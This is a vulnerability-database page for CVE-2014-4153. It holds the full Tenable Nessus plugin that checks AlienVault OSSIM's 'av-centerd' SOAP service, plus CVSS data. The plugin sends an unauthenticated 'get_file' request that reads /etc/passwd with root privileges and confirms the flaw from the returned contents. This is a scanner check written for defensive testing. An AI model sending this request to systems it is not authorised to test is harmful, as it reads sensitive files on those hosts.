Lucene search
This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.OSSIM_SOAP_4_8_0_INFORMATION_DISCLOSURE.NASLHistoryJun 25, 2014 - 12:00 a.m.
AlienVault OSSIM 'av-centerd' get_file() Information Disclosure
2014-06-2500:00:00
This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
14
CVSS2
7.8
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
EPSS
0.301
Percentile
97.0%
The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by an information disclosure vulnerability in the ‘av-centerd’ SOAP service due to a failure to sanitize user input to the ‘get_file’ method. A remote, unauthenticated attacker can exploit this vulnerability to read arbitrary files with root privileges.
Note that this version is reportedly also affected by two remote code execution vulnerabilities. However, Nessus did not test for these additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(76214);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2014-4153");
script_bugtraq_id(68018);
script_name(english:"AlienVault OSSIM 'av-centerd' get_file() Information Disclosure");
script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by an information disclosure
vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of AlienVault Open Source
Security Information Management (OSSIM) that is affected by an
information disclosure vulnerability in the 'av-centerd' SOAP service
due to a failure to sanitize user input to the 'get_file' method. A
remote, unauthenticated attacker can exploit this vulnerability to
read arbitrary files with root privileges.
Note that this version is reportedly also affected by two remote code
execution vulnerabilities. However, Nessus did not test for these
additional issues.");
script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/2806");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-207/");
script_set_attribute(attribute:"solution", value:
"Upgrade to 4.8.0 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-4153");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/13");
script_set_attribute(attribute:"patch_publication_date", value:"2014/06/02");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/25");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:alienvault:open_source_security_information_management");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ossim_soap_detect.nbin");
script_require_ports("www/AlienVault OSSIM 'av-centerd' SOAP Service");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("string.inc");
include("data_protection.inc");
function _soap_create_request(tag, header, body, schema_year)
{
local_var request;
if (isnull(body))
return NULL;
if (isnull(schema_year))
schema_year = "2001";
if (isnull(tag))
tag = "soapenv";
request =
'<?xml version="1.0" encoding="utf-8"?>
<' + tag + ':Envelope ' + tag + ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/' + schema_year + '/XMLSchema-instance"
xmlns:' + tag + '="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/' + schema_year + '/XMLSchema">';
if (!isnull(header))
request += '<' + tag + ':Header>' + header + '</' + tag + ':Header>';
request +=
'<' + tag + ':Body>' +
body +
'</' + tag + ':Body>
</' + tag + ':Envelope>';
return request;
}
function soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)
{
local_var result;
if (isnull(soap_tag))
soap_tag = "soapenv";
if (isnull(headers))
{
headers = make_array(
"Content-type", "application/soap+xml",
"User-Agent", "Nessus SOAP v0.0.1 (Nessus.org)"
);
}
headers["SOAPAction"] = soap_action;
result = http_send_recv3(
method : "POST",
item : url,
port : port,
add_headers : headers,
data : _soap_create_request(tag:soap_tag, header:soap_header, body:request),
exit_on_fail : exit_on_fail
);
return result;
}
app_name = "AlienVault OSSIM 'av-centerd' SOAP Service";
port = get_kb_item_or_exit('www/' + app_name);
method = 'get_file';
method_namespace = 'AV/CC/Util';
soap_action = strcat(method_namespace, '#', method);
url = "/av-centerd";
filename = '/etc/passwd';
request =
'<m:' + method + ' xmlns:m="' + method_namespace + '">
<string>All</string>
<string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>
<string>' + unixtime() + '</string>
<string>' + SCRIPT_NAME + '</string>
<string>' + filename + '</string>
</m:' + method + '>';
soap_response =
soap_send_request(
soap_action:soap_action,
url:url,
port:port,
request:request,
exit_on_fail:TRUE);
# Verify that we got back the contents of command executed.
pattern = ">(root:x:0:0:root.*)";
match = pregmatch(string:soap_response[2], pattern:pattern);
if (isnull(match)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);
contents_start = stridx(soap_response[2], ">root:x:0") + 1;
contents = right(soap_response[2], strlen(soap_response[2]) - contents_start);
contents_end = stridx(contents, "</item>");
contents = strip(left(contents, contents_end));
report = NULL;
attach_file = NULL;
output = NULL;
req = http_last_sent_request();
request = NULL;
if (report_verbosity > 0)
{
report =
'\n' + "Nessus was able to obtain the contents of '" + filename + "' with the" +
'\n' + 'following request :' +
'\n' +
'\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) +
'\n' + chomp(req) +
'\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) +
'\n';
contents = data_protection::redact_etc_passwd(output:contents);
if (contents && report_verbosity > 1)
{
output = contents;
request = make_list(req);
attach_file = filename;
}
}
security_report_v4(port:port,
extra:report,
severity:SECURITY_HOLE,
request:request,
file:attach_file,
output:output);
Related
cvelist
cvelist
CVE-2014-4153
2014-06-18 19:00:00
exploitdb
exploitdb
prion
prion
Cross site request forgery (csrf)
2014-06-18 19:55:00
cve
cve
CVE-2014-4153
2014-06-18 19:55:06
zdi
zdi
nvd
nvd
CVE-2014-4153
2014-06-18 19:55:06
CVSS2
7.8
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
EPSS
0.301
Percentile
97.0%
Related for OSSIM_SOAP_4_8_0_INFORMATION_DISCLOSURE.NASL